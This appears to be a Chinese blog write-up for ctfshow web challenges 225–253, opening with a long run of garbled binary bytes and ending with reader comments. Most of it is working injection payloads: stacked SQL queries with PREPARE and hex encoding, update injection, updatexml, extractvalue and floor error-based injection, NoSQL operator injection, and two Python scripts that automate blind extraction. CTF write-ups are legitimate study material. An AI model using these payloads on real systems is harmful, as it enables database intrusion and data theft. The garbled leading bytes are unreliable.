B�@��G�q+B5]HM��l�P5~T5��	�"�x��=*F*����w��8#HU�h��b����UU����Z���@�|��D�WΥJX�C��8F��� |��e�E��{'KX˒�����uw����]X.+b��b)���X�]A,�j�4͎[k��>=@,����_�ّ3���$���oww��@���>�q�6UJX��=b)���X�b����*;nE,? ��
��j7��x֎[�n։,K��w�JĂ/yn�?���F���b���v�Q����������^��~}�g`:�z�?�Ăo���F܊X;� �-�c���_��F܊X��o��R��#P*�u4�rk�z����^,v�l�o/z��.�W#c#kԕ��{�v̶C����H���\X���LJޫ�]l�-�8��*���g&̍k�-�(����4�3Ot�
N������2��:�������7�����k��;�$u�7���`�^KI}]��sb����%a�$L���%a&I�rOLK�̒0徚��Y$aʽ9-	�J”�{Zf��)��$,F��gT�0xT��F�(z����͕Q�;5%
���jJ6�D�wՔ4l,��w�)i؞E�WSҰ�����a)}hMI��4(zٚ���.P�õ$�Dz�����a�E_^SҰl����>i��(��7��?�Իvd��{�Ѝ���f����C��jp6���Z7���{���d��a�������R3n�w��7���1��E�]
N��G�N�(p8�}o���]��s�e�{,����Ӄ�Z<<��ޕ7qK��M�˦佲%C[���eީ�����T��N�)zm_�N�{�����N���){���7V�ڥ�X�{,����+��xx����Í���C���Bp��}?�]�Z��\�y���{���.��V�Ԉ[��_z�ǻ��r=�Մlj^[�'y�ew��{Fp�K�'�������{����
�{���z��������Xvf��=	�X�p��>������{��J�Ά�l�-�*��J�q0h�a^׫���3��^!8&(4E#���2��{oIO&��z��ߔ`ޣ��T�^�v����8�4��c-��w8�_����=�Hxc�5�[��Z�������S3����ppLP�5V����~�(�{����k
f7�R�Z�a@���z�]�����W�ؼ�c)��$��V�ޒ���t̵��,(��xm���̈́	��B��}'���{�`)(��<����v��@:�ZÅ�XP
p���9�YM�$y��ˣ�|l��+5A��H�8�����Z=8$ 0���`�fRL�
����c�%̾�/��PI�;fX�����'Ɖx�'an�|�}�!{vǴ���I1M����sY�ɣ!! &C���3��3)�#�~ق[����r�|P���]?J�V'��5y��qT��� v+K���ϞOq�f*(�T�I#DQ��V�\W}R	Q��G(�e�I#DQ��V��[}R	Q�&e(�v�I#DQ��V��_}R	QĆ�(��I#DQ��V�DKRM����1��*
(K-�)��Ge��S��**b��4%U����=o��RU��E�Tye�$'���ʄ U����gA��O�	R�9�������� U���q�@P��A�Ty�Ԝw����l�,ϖf������r5Kգp�R����j�x��NA=�
����a�������������x

最后rce

web225

方法一 handler

ctfshow';show tables;

堆叠注入

ctfshow';show tables;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;

方法二 预处理

api/?username=ctfshow';PREPARE huayang from concat('s','elect', ' database()');EXECUTE huayang;
api/?username=ctfshow';PREPARE huayang from concat('s','elect', " table_name  from information_schema.tables where table_schema='ctfshow_web'");EXECUTE huayang;
api/?username=ctfshow';PREPARE huayang from concat('s','elect', " column_name  from information_schema.columns where table_name='ctfshow_flagasa'");EXECUTE huayang;
api/?username=ctfshow';PREPARE huayang from concat('s','elect', " flagas from ctfshow_flagasa");EXECUTE huayang;

当然查了表之后可直接爆所有不用再爆一下字段

api/?username=ctfshow';PREPARE huayang from concat('s','elect', " * from ctfshow_flagasa");EXECUTE huayang;

当然还可以用char绕过

api/?username=ctfshow';PREPARE huayang from concat(char(115,101,108,101,99,116), ' database()');EXECUTE huayang;

web226

依旧是堆叠

一步到位,和上面差不多,只不过过滤了)所以转换成16进制就行了

api/?username=1';PREPARE huayang from 0x73656c656374202a2066726f6d2063746673685f6f775f666c61676173;EXECUTE huayang;

web227

在  MySQL 中,存储过程和函数的信息存储在  information_schema

api/?username=1';PREPARE huayang from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e526f7574696e6573;EXECUTE huayang;

web228-230

以下几道依旧延续226的做法

228

api/?username=1';PREPARE huayang from 0x73656c656374202a2066726f6d2063746673685f6f775f666c616761736161;EXECUTE huayang;

229

api/?username=1';PREPARE huayang from 0x73656c656374202a2066726f6d20666c6167;EXECUTE huayang;

230

api/?username=1';PREPARE huayang from 0x73656c656374202a2066726f6d20666c61676161626278;EXECUTE huayang;

web231

update注入

不会看看y4tacker和yq1ng师傅的

方法一 子查询

password=',username=(select yq1ng.a from (select group_concat(flagas)a from flaga) yq1ng) where username="user1";#

方法二

password=1',username=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where 1=1#&username=1
password=1',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga') where 1=1#&username=1
password=1',username=(select flagas from flaga) where 1=1#&username=1

web232

web233

不会,给手师傅的

"""
Author:Y4tacker
"""
import requests
url = "http://f23e96e7-5510-46dd-a866-52a312e2ccdb.chall.ctf.show/api/?page=1&limit=10"
result = ""
i = 0
while 1:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查表名
        # payload = "select column_name from information_schema.columns where table_name='flag233333' limit 1,1"
        # 查数据
        payload = "select flagass233 from flag233333"
        data = {
            'username': f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.05),1)#",
            'password': '4'
        }
        try:
            r = requests.post(url, data=data, timeout=0.9)
            tail = mid
        except Exception as e:
            head = mid + 1
    if head != 32:
        result += chr(head)
        print(data)
    else:
        break
    print(result)
#1'%20or%20if(ascii(substr((select%20flagass233%20from%20flag233333),1,1))>101,sleep(5),1)%23%26limit=10
# username:1'%20or%20if(ascii(substr((select%20flagass233%20from%20flag233333),1,1))>101,sleep(1),1)%23
# password:4

多搞几次,可能flag不对

web244

报错注入

api/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),2)%23
api/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23
api/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flag'),0x7e),1)%23
api/?id=1' and updatexml(1,concat(0x7e,(select flag from ctfshow_flag),0x7e),1)%23

出不完需要截取

最多可以出31位而flag为42位

配合left或right进行截取

api/?id=1' and updatexml(1,concat(0x7e,(select right(flag,11) from ctfshow_flag),0x7e),1)%23

也可以使用substr进行截取

api/?id=1' and updatexml(1,concat(0x7e,(select substr(flag,32,43) from ctfshow_flag),0x7e),1)%23

web245

使用extractvalue

api/?id=1' and (extractvalue(1,concat(0x7e,(select substr(flag1,1,31) from ctfshow_flagsa),0x7e)))%23
api/?id=1' and (extractvalue(1,concat(0x7e,(select substr(flag1,32,43) from ctfshow_flagsa),0x7e)))%23

web246

api/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;%23
api/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database()limit 1,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;%23
api/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='ctfshow_flags' limit 1,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;%23
api/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select flag2 from ctfshow_flags),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;%23

web247

试不出来

web249

nosql注入

api/?id[]=flag

web250

username[$gt]=1&password[$gt]=1

web251-252

username[$gt]=1&password[$gt]=1
username[$gt]=admin&password[$gt]=ctfshow666nnneeaaabbbcc

web253

来一手yq1ng师傅的脚本 师傅的正则’^’

正则还可以用非贪婪 .*?

# encoding:     utf-8
# @Author:      yq1ng
# @Date:        2020-11-29 15:20
# @challenges: web253
import requests
url = "http://aa891c9f-c9f4-4e84-8341-21aabe486b6e.chall.ctf.show/api/"
data = {"username[$regex]":"flag","password[$regex]":""}
s = requests.session()
def get_flag():
    flag = ""
    for x in range(1,43):
        for y in r'flag{b7c4de-2hi1jk0mn5o3p6q8rstuvw9xyz}':
            data["password[$regex]"] = ".*?"+flag+y
            s = requests.post(url, data = data)
            if "6210" in s.text:
                print(data)
                flag += y
                print(flag)
                break
if __name__ == '__main__':
    get_flag()

可以用此吃出name和password

Time:2020.12.16

参照:

https://yq1ng.github.io/z_post/CTFSHOW-WEB%E5%85%A5%E9%97%A8-Ttick%E6%80%BB%E7%BB%93/#more

https://y4tacker.blog.csdn.net/article/details/110144623[/huayang]

==>转载请注明来源哦<==

评论

  1. 头像
    Windows Firefox
    3月前
    2021-10-15 20:12:19

    学习

  2. 头像
    1111
    Windows Chrome
    4月前
    2021-9-16 23:28:26

    师傅们嗨起来!!

  3. 头像
    midi
    Windows Chrome
    4月前
    2021-9-16 23:27:28

    学习学习

  4. 头像
    q
    Windows Chrome
    6月前
    2021-8-09 3:04:45

    kk

  5. 头像
    echo
    Windows Chrome
    6月前
    2021-8-06 20:23:04

    6666666

  6. 头像
    孤桜
    Windows Chrome
    6月前
    2021-8-02 9:44:11

    加油

  7. 头像
    66
    Windows Chrome
    6月前
    2021-7-17 15:48:45

    111

  8. 头像
    asd
    Windows Chrome
    6月前
    2021-7-16 22:55:14

    asda

  9. 头像
    牛马
    Android Chrome
    6月前
    2021-7-16 12:12:46

    太强了

  10. 头像
    abc
    Windows Chrome
    6月前
    2021-7-15 12:13:57

    tql

  11. 头像
    anf
    Windows Chrome
    7月前
    2021-6-15 16:51:01

    瞅一瞅

  12. 头像
    xss
    Windows Chrome
    8月前
    2021-5-20 16:23:22

    牛蛙

  13. 头像
    666
    Windows Chrome
    9月前
    2021-4-20 19:16:58

    牛啊

  14. 头像
    小熊
    Windows Firefox
    10月前
    2021-4-15 10:08:55

    求大佬绑带

  15. 头像
    暗霄白虹
    10月前
    2021-3-31 23:43:36

    师傅带带

  16. 华扬
    华扬 博主
    1年前
    2020-12-16 11:10:31

    承蒙师傅厚爱

  17. 头像
    晚安
    1年前
    2020-12-16 11:04:40

    菜鸡来贴贴大佬了

  18. 华扬
    华扬 博主
    1年前
    2020-12-07 16:04:38

    ?真的累了,太艹?了

  19. 华扬
    华扬 博主
    1年前
    2020-11-30 15:46:48

    师傅们嗨起来!!

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇